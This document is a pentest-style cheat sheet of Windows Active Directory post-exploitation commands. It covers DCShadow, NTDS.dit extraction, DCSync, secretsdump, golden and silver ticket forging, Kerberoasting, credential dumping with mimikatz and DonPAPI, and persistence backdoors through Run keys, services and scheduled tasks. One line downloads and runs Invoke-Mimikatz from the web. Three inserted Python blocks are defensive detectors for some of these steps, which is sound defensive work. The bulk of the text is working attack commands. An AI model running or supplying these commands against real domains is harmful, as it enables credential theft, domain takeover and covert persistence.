# Post exploitation techniques

**DC SHADOW**

`# DCShadow is a post-compromise attack: it pushes object changes, with forged replication metadata, into the domain`\
`# It runs on a compromised client, using a domain admin account (the client registers itself as a temporary DC)`\
`# You can run it with Mimikatz (two elevated terminals are needed)`\
\
`# Terminal 1 (runas)`\
`mimikatz # !+`\
`mimikatz # !processtoken`\
`mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42`\
\
`# Terminal 2 (runas)`\
`mimikatz # lsadump::dcshadow /push`\
\
`# You can check the success through repadmin on the DC`\
`repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"`

**NTDS database**

`# Default location of the NTDS database on the domain controller`\
`C:\Windows\NTDS\NTDS.dit`\
\
`# Step 1 → Find a way to get the NTDS.dit and SYSTEM files`\
`# Step 2 → Crack/Analyze offline`\
\
**Local Extraction** \
**VSSadmin** \
`# Retrieval via VSSadmin`\
`# Create a Volume Shadow Copy`\
`C:\Windows\system32> vssadmin create shadow /for=C:`\
\
`# Retrieve NTDS from the copy`\
`C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit c:\Extract\ntds.dit`\
\
`# Copy the SYSTEM hive (from the live registry, or from the shadow copy)`\
`C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS`\
`C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM`\
\
`# Clean up (delete the shadow copy)`\
`C:\Windows\system32> vssadmin delete shadows /shadow={uuid}`\
\
`# Trick if you are on a semi-interactive shell`\
`# You can specify the /quiet option to skip the prompt`\
`# Useful for deletion (as it requires a confirmation)`\
`vssadmin delete shadows /shadow={uuid} /quiet`\
\
**ntdsutil tool** \
`# ntdsutil is a built-in tool used to manage AD`\
`# You can abuse it to create a backup (IFM media) that contains the ntds.dit file`\
`ntdsutil`\
`activate instance ntds`\
`ifm`\
`create full C:\ntdsutil`\
`quit`\
`quit`\
\
**DC Sync / Mimikatz** \
`# DCSync is a less noisy way to extract user information (nothing is written to disk on the DC)`\
`# It uses the DRS (Directory Replication Service) protocol to ask the DC to replicate the secrets`\
\
`# Classic`\
`mimikatz # lsadump::dcsync /domain:domain.lan /all /csv`\
\
`# Specific user`\
`mimikatz # lsadump::dcsync /domain:domain.lan /user:test`\
\
**PowerSploit** \
`# PowerSploit contains a script using the volume shadow copy service`\
`Import-Module .\VolumeShadowCopyTools.ps1`\
`New-VolumeShadowCopy -Volume C:\`\
`Get-VolumeShadowCopy`\
\
`# Also possible through a meterpreter session`\
`powershell_shell`\
`New-VolumeShadowCopy -Volume C:\`\
`Get-VolumeShadowCopy`\
\
**Invoke-DCSync** \
`# Powershell script`\
`# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz`\
`Invoke-DCSync`\
\
`# Get another output format (user:id:lm:ntlm)`\
`Invoke-DCSync -PWDumpFormat`\
`# It is also possible through a meterpreter session`\
\
**Nishang**

`# Nishang is a PowerShell post-exploitation framework`\
`# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files`\
`Import-Module .\Copy-VSS.ps1`\
`Copy-VSS`\
`Copy-VSS -DestinationDir C:\ShadowCopy\`\
\
`# You can also use them through a meterpreter session by loading the powershell extension`\
`load powershell`\
`powershell_import /root/Copy-VSS.ps1`\
`powershell_execute Copy-VSS`\
\
`# Also possible to establish a direct connection`\
`powershell_shell`\
`PS > Copy-VSS`\
`PS > Copy-VSS -DestinationDir C:\ninja`

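An added example (not from the original page): detection logic a defender could run over process-creation telemetry (Security event 4688 or Sysmon event 1 command lines) to spot the local extraction steps above. The hostnames, users and events are constructed for this example.

```python
import re

# Command-line indicators for the local NTDS extraction steps shown above. Each
# pattern matches one step; the remote WMI variant is caught too, because the inner
# "cmd /c vssadmin ..." string is part of the wmic command line.
NTDS_PATTERNS = [
    ("vss_shadow_create", re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("vss_shadow_delete", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    # ntdsutil is interactive above; the one-liner form puts "ifm" on the command line
    ("ntdsutil_ifm", re.compile(r"ntdsutil.*\bifm\b", re.I)),
    ("ntds_copy_from_shadow",
     re.compile(r"GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+.*ntds\.dit", re.I)),
    ("system_hive_save", re.compile(r"reg(\.exe)?\s+save\s+hklm\\system", re.I)),
    ("powershell_vss", re.compile(r"New-VolumeShadowCopy|Copy-VSS", re.I)),
]

def classify_command(cmdline):
    """Return the names of every indicator matching one process command line."""
    return [name for name, rx in NTDS_PATTERNS if rx.search(cmdline)]

def scan_events(events):
    """events: iterable of (host, user, cmdline) from 4688/Sysmon-1 records.
    Returns (alerts, chained): every matching event, plus the hosts where a shadow
    copy was created AND ntds.dit was copied out of it. Backup agents also create
    shadow copies, so the full chain is what deserves priority."""
    alerts, per_host = [], {}
    for host, user, cmd in events:
        hits = classify_command(cmd)
        if hits:
            alerts.append({"host": host, "user": user, "indicators": hits, "cmd": cmd})
            per_host.setdefault(host, set()).update(hits)
    chained = sorted(h for h, hits in per_host.items()
                     if {"vss_shadow_create", "ntds_copy_from_shadow"} <= hits)
    return alerts, chained

# Constructed sample events (host, user, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("DC01", "NORZH\\admin", "vssadmin create shadow /for=C:"),
    ("DC01", "NORZH\\admin",
     r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit c:\Extract\ntds.dit"),
    ("DC01", "NORZH\\admin", r"reg SAVE HKLM\SYSTEM c:\Extract\SYS"),
    ("DC02", "NT AUTHORITY\\SYSTEM", "vssadmin create shadow /for=C:"),  # backup job, no copy
    ("WS01", "NORZH\\bob", r"notepad.exe C:\Users\bob\notes.txt"),
]

if __name__ == "__main__":
    found, chain = scan_events(SAMPLE_EVENTS)
    print(len(found), "suspicious events; full extraction chain on:", chain)
```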
**Remote Extraction** \
**CrackMapExec** \
`crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi`\
\
**WMI - Remote**\
`# It is possible to remotely extract the NTDS database using WMI and VSSADMIN`\
`wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"`\
`wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"`\
`wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"`\
\
\
**Impacket** \
`$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\
\
`$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL`\
\
**NTDS Extraction and analysis** \
`# Impacket provides a useful script to do that (decrypt the copied files)`\
`impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit DOMAIN`\
\
`# Also possible to dump it remotely by using the computer account and its hash`\
`impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1`\
\
`# Extraction is also possible using NTDSDumpEx`\
`NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive`\
\
`# Or adXtract`\
`./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab`\
\
**Empire** \
`# Empire has 2 modules you can use to retrieve hashes through DCSync`\
`usemodule credentials/mimikatz/dcsync_hashdump`\
`usemodule credentials/mimikatz/dcsync`
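
An added example, not part of the original page: the DC-side detection that covers every DCSync variant above (mimikatz, Invoke-DCSync, Empire, secretsdump -just-dc). A replication request makes the DC log Security event 4662 naming the replication extended rights, and any account other than a domain controller or a known sync account asking for them is the signal. The sample events are constructed.

```python
import re

# Extended rights a DRSUAPI replication request needs. DCSync asks the DC for exactly
# these, so the DC logs a 4662 event listing them, provided "Directory Service Access"
# auditing is enabled and the domain root carries an audit (SACL) entry for them.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RX = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def replication_rights_in(properties):
    """Map the GUIDs in a 4662 'Properties' field to replication right names, in order."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RX.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]

def detect_dcsync(events, expected_replicators):
    """events: dicts with at least EventID, SubjectUserName and Properties.
    expected_replicators: accounts that replicate legitimately (DC machine accounts,
    and e.g. an Azure AD Connect service account). One alert per other account."""
    allowed = {a.upper() for a in expected_replicators}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if rights and ev["SubjectUserName"].upper() not in allowed:
            alerts.append({"account": ev["SubjectUserName"], "rights": rights})
    return alerts

# Constructed sample events; the Properties text mimics the 4662 layout.
REPL = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "Control Access " + REPL},
    {"EventID": 4662, "SubjectUserName": "jdoe", "Properties": "Control Access " + REPL},
    # same user reading an ordinary attribute; the GUID is a constructed placeholder
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "Read Property {00000000-0000-0000-0000-0000000000aa}"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "Properties": ""},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662, {"DC01$", "DC02$"}):
        print(a["account"], "requested", ", ".join(a["rights"]))
```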

**Ticket generation from Linux** \
`# Generate a ticket (or convert a kekeo ticket to ccache format)`\
`$ ticketer.py -nthash <hash> -domain-sid <sid> -domain <domain> <user>`\
\
`# Export the path in the right variable`\
`$ export KRB5CCNAME=/tmp/ticket.ccache`\
`$ klist`\
\
`# Exec and use the ticket`\
`$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host`\
\
`# Dump NTDS`\
`$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss`\
\
**Golden Ticket** \
`# Golden Ticket prerequisites`\
`> Administrator account name (Administrateur)`\
`> Fully qualified domain name (domain.local)`\
`> Domain SID (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]`\
`> NTLM hash of the krbtgt account (6194bd1a5bf3ecd542e8aac9860bddf0)`\
\
`mimikatz # privilege::debug`\
`mimikatz # lsadump::lsa /inject /name:krbtgt`\
\
`mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt`\
\
`Use :`\
`mimikatz # kerberos::ptt domain.local.kirbi`\
`mimikatz # kerberos::list`\
\
`# Resource`\
`https://twitter.com/mpgn_x64/status/1241688547037532161`\
\
`# Golden ticket but access denied?`\
`# from cmd (elevated)`\
`> mimikatz kerberos::golden`\
`> klist add_bind <DOMAIN> <DC>`\
`> psexec \\dc\ cmd`\
\
**Playing with tickets on Windows** \
`# Current sessions`\
`mimikatz # sekurlsa::logonpasswords`\
\
`# Ticket TGT`\
`# Dump SPN`\
`PS C:\> Find-PSServiceAccounts -DumpSPN`\
`Discovering service account SPNs in the AD Domain foo.local`\
`svcSQLServ/pc1.foo.local:1433`\
\
`# Download Mimikatz`\
`PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')`\
`PS C:\> Invoke-Mimikatz`\
`mimikatz(powershell) # sekurlsa::logonpasswords`\
`ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`\
\
`# List active tickets, or purge them`\
`PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'`\
`PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'`\
`PS C:\> klist`\
\
`# Request a ticket`\
`PS C:\> Add-Type -AssemblyName System.IdentityModel`\
`PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"`\
\
`# Export a ticket`\
`mimikatz # kerberos::list /export`\
\
`# Crack Ticket`\
`python tgsrepcrack.py wordlist.txt ticket.kirbi`

**Tips** \
`# Getting passwords from browser memory`\
`procdump.exe -ma firefox_pid`\
`strings.exe firefox.dmp | findstr /i "Passwd="`\
\
**Scavenger** \
`# Scavenger is a tool built on top of CrackMapExec to automate the search`\
`# for sensitive files and information during an internal pentest`\
`python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local`\
\
`$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite`\
\
**WinSCP** \
`# WinSCP stores saved session passwords in the registry, only obfuscated, unless a master password is set`\
`# You can manually query the key`\
`reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2"`\
`reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\username@ip"`\
\
`# Then recover the password using the following binary`\
`https://github.com/anoopengineer/winscppasswd/releases`\
`.\winscppasswd ip user`\
\
`# Automation using CrackMapExec`\
`# Using invoke_sessiongopher you can recover information about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP`\
`crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher`\
\
**Snaffler**\
`https://github.com/SnaffCon/Snaffler`\
\
`# Snaffler is a tool made to automate information gathering on Windows hosts and domains`\
`# it focuses on locations such as network shares`\
\
`snaffler.exe -s -o snaffler.log`\
\
`-o Enables outputting results to a file. You probably want this if you're not using -s. e.g. -o C:\users\thing\snaffler.log`\
\
`-s Enables outputting results to stdout as soon as they're found. You probably want this if you're not using -o.`\
\
`-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug`\
\
`-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.`\
\
`-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.`\
\
`-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.`\
\
`-d Domain to search for computers to search for shares on to search for files in. Easy.`\
\
`-c Domain controller to query for the list of domain computers.`\
\
`-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.`\
\
`-j How many bytes of context either side of found strings in files to show, e.g. -j 200`\
\
`-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.`\
\
\
**DonPAPI**\
`https://github.com/login-securite/DonPAPI`\
`# Dumps relevant information from compromised targets without AV detection`\
`# With a user password, or the domain PVK, we can unprotect the user's DPAPI secrets.`\
\
`# Currently gathered info`\
`# - Windows credentials (scheduled task credentials & a lot more)`\
`# - Windows Vaults`\
`# - Windows RDP credentials`\
`# - AdConnect (still requires a manual operation)`\
`# - Wifi keys`\
`# - Internet Explorer credentials`\
`# - Chrome cookies & credentials`\
`# - Firefox cookies & credentials`\
`# - VNC passwords`\
`# - mRemoteNG password (with default config)`\
\
`# Classic launch`\
`DonPAPI.py domain/user:passw0rd@target`\
\
`# Using hash`\
`DonPAPI.py --hashes <LM>:<NT> domain/user@target`\
\
`# Using Kerberos or local auth`\
`DonPAPI.py -k domain/user@target`\
`DonPAPI.py -local_auth user@target`\
\
`# If user has LAPS reading privilege`\
`DonPAPI.py -laps domain/user:passw0rd@target`\
\
`# If you are domain admin, you can dump the domain backup key using impacket`\
`# Then you can use the PVK (backup key) to dump all users secrets`\
`dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip`\
`python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`

**PERSISTENCE**

**Resources** \
`https://rastamouse.me/2018/03/a-view-of-persistence/`\
\
**Userland & Elevated** \
`# Userland techniques`\
\
`# HKCU`\
`# Create a REG_SZ value in the Run key under HKCU\Software\Microsoft\Windows\CurrentVersion. (Other keys are available).`\
`Value name: Backdoor`\
`Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe`\
\
`# Start-up`\
`# Create a batch script in the user startup folder.`\
`PS C:\> gc "C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat"`\
`start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe`\
\
`# Scheduled Tasks`\
`PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"`\
`PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"`\
`PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"`\
`PS C:\> $S = New-ScheduledTaskSettingsSet`\
`PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\
`PS C:\> Register-ScheduledTask Backdoor -InputObject $D`\
\
`# Powershell profiles`\
`# You can backdoor the powershell profile`\
`PS C:\> Test-Path $profile`\
`False`\
\
`PS C:\> New-Item -Path $profile -Type File -Force`\
\
`Directory: C:\Users\Rasta\Documents\WindowsPowerShell`\
\
`Mode LastWriteTime Length Name`\
`---- ------------- ------ ----`\
`-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1`\
\
`PS C:\> $string = 'Start-Process "cmd.exe"'`\
`PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append`\
\
`# Elevated techniques`\
\
`# HKLM`\
`# Similar to HKCU. Create a REG_SZ value in the Run key under HKLM\Software\Microsoft\Windows\CurrentVersion`\
`Value name: Backdoor`\
`Value data: C:\Windows\Temp\backdoor.exe`\
\
`# Services`\
`# Create a service that will start automatically or on-demand.`\
`PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."`\
\
`# Scheduled Tasks`\
`PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"`\
`PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am`\
`PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest`\
`PS C:\> $S = New-ScheduledTaskSettingsSet`\
`PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`\
`PS C:\> Register-ScheduledTask Backdoor -InputObject $D`

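An added example, not from this page or the linked article: a small classifier over constructed endpoint telemetry (Sysmon registry/file events, Security 4698 task creation and System 7045 service installation records) that flags the userland and elevated persistence locations listed above. The patterns, field names and sample events are assumptions built for this example.

```python
import re

# Locations the persistence examples above use: autostart registry keys, the user
# Startup folder, the PowerShell profile, and payloads living in user-writable temp
# directories. All patterns are constructed for this example.
RUN_KEY_RX = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
STARTUP_RX = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
PROFILE_RX = re.compile(r"\\WindowsPowerShell\\(Microsoft\.PowerShell_)?profile\.ps1$", re.I)
WRITABLE_PATH_RX = re.compile(
    r"\\(AppData\\(Local|Roaming)\\Temp|Windows\\Temp|Users\\[^\\]+\\(Downloads|Desktop))\\", re.I)

def classify(ev):
    """ev: {'kind': registry_set|file_create|task_create|service_install,
            'target': key / path / name, 'payload': value data, file content,
            task command or service ImagePath}. Returns the persistence reasons found."""
    kind, target, payload = ev["kind"], ev.get("target", ""), ev.get("payload", "")
    reasons = []
    if kind == "registry_set" and RUN_KEY_RX.search(target):
        reasons.append("run_key_autostart")
    if kind == "file_create" and STARTUP_RX.search(target):
        reasons.append("startup_folder_drop")
    if kind == "file_create" and PROFILE_RX.search(target):
        reasons.append("powershell_profile_written")
    in_writable = bool(WRITABLE_PATH_RX.search(payload))
    # New tasks and services are routine; they become interesting when they run from a
    # directory any user can write to, which both elevated examples above do.
    if kind in ("task_create", "service_install") and in_writable:
        reasons.append(kind + "_runs_from_writable_path")
    elif reasons and in_writable:
        reasons.append("payload_in_writable_path")
    return reasons

def scan(events):
    """Return [(event, reasons)] for every event that classify() flags."""
    return [(ev, r) for ev in events for r in [classify(ev)] if r]

# Constructed sample telemetry (Sysmon 13/11, Security 4698, System 7045 style).
SAMPLE_EVENTS = [
    {"kind": "registry_set", "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Backdoor",
     "payload": r"C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"},
    {"kind": "file_create", "target": r"C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat",
     "payload": r"start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"},
    {"kind": "file_create", "target": r"C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1",
     "payload": 'Start-Process "cmd.exe"'},
    {"kind": "task_create", "target": "Backdoor", "payload": r"cmd.exe /c C:\Windows\Temp\backdoor.exe"},
    {"kind": "service_install", "target": "Backdoor", "payload": r"C:\Windows\Temp\backdoor.exe"},
    {"kind": "task_create", "target": "VendorUpdate", "payload": r"C:\Program Files\Vendor\update.exe /silent"},
]
```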
**Maintaining Privilege** \
`# Steal passwords and use them with runas`\
`runas /netonly /user:FS01\Administrator cmd`\
\
`# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.`\
`# Both domain accounts and local accounts can work.`\
`mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt`\
\
`# Adding new local users can be a method to get back into machines`\
`# Administrators local group is a solution, but you can also use the following groups`\
`Remote Desktop Users`\
`Remote Management Users`\
`Backup Operators`\
\
`# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.`\
`mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt`\
\
`# Golden tickets can be used to forge access to any service in the domain.`\
`mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt`
